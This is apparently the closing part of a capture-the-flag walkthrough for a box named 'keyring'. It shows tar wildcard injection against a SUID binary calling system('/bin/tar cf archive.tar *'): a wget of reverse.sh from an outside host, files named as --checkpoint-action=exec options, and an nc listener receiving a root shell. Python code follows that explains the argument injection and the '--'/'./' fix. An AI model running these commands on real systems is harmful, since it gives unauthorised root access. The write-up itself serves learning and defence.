_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

The key part is /bin/tar cf archive.tar *; after running it, archive.tar appears in the directory.
The exploitation method is on GTFOBins.

Create two files:

john@keyring:~$ wget 192.168.240.11/reverse.sh 
john@keyring:~$ touch -- "--checkpoint=1"
john@keyring:~$ touch -- "--checkpoint-action=exec=bash reverse.sh"
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@keyring:~# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1000(john)
root@keyring:~#

I learned that the -- here tells touch that what follows is not an option and must not be parsed as one, because the filename itself begins with --.
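The same `--` that touch needed is exactly what the SUID `compress` binary is missing. Its `system("/bin/tar cf archive.tar *")` lets the shell expand `*` into the file names, and tar then parses any name starting with `-` as an option. The following is an added example, not the box's code: it builds a constructed directory holding the three files created above, shows the argument vector tar receives in the vulnerable form and in a fixed form (`--` plus `./`-prefixed names), and classifies which arguments tar would treat as options. Nothing is executed; the functions only build and inspect argument lists.

```python
import os
import tempfile


def make_demo_dir():
    """Constructed directory with the three file names from the walkthrough above."""
    d = tempfile.mkdtemp(prefix="keyring-demo-")
    for name in ("reverse.sh", "--checkpoint=1", "--checkpoint-action=exec=bash reverse.sh"):
        with open(os.path.join(d, name), "w") as fh:
            fh.write("")  # empty files are enough; only the names matter here
    return d


def listing(directory):
    """Non-hidden entries, bytewise sorted (close to what the shell's * glob yields)."""
    return sorted(n for n in os.listdir(directory) if not n.startswith("."))


def shell_glob_argv(directory):
    """What /bin/sh hands to tar for `tar cf archive.tar *`: every glob match is
    appended as-is, including names that begin with '-'."""
    return ["/bin/tar", "cf", "archive.tar", *listing(directory)]


def safe_tar_argv(directory):
    """Fixed form: '--' ends option parsing and every name is prefixed with './',
    so a file called --checkpoint=1 can only ever be a member path."""
    return ["/bin/tar", "cf", "archive.tar", "--", *("./" + n for n in listing(directory))]


def options_seen(argv):
    """getopt_long-style view (old-style 'cf' aside): GNU tar permutes its
    arguments, so any argument before a bare '--' that starts with '-' is an
    option wherever it appears; everything after '--' is an operand."""
    opts = []
    for arg in argv[1:]:
        if arg == "--":
            break
        if arg.startswith("-"):
            opts.append(arg)
    return opts


def checkpoint_action_injected(argv):
    """True when tar would run a --checkpoint-action=exec=... command."""
    return any(o.startswith("--checkpoint-action=exec=") for o in options_seen(argv))


if __name__ == "__main__":
    d = make_demo_dir()
    print("vulnerable:", options_seen(shell_glob_argv(d)))   # two injected options
    print("fixed:     ", options_seen(safe_tar_argv(d)))     # []
```

The `./` prefix matters on its own as well as `--`: it is what keeps the names from being mistaken for options even by tools that do not honour `--`. For a setuid helper the fuller fix is to drop `system()` and the shell entirely and call `execve` with a fixed argument vector, which is what `safe_tar_argv` models.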

Summary: I was stuck on this box for a long time, but learned a lot: from now on use gobuster for directory scanning; learned wfuzz for parameter fuzzing; for leaked source code, use git log and git diff to find the differences between historical versions. The final privilege escalation only needed a slight modification of the PoC.

Group owner's walkthrough video: https://www.bilibili.com/video/BV17iP6eLEP2/?spm_id_from=333.1387.upload.video_card.click&vd_source=2971771be3c690f4dabe696dc01299f2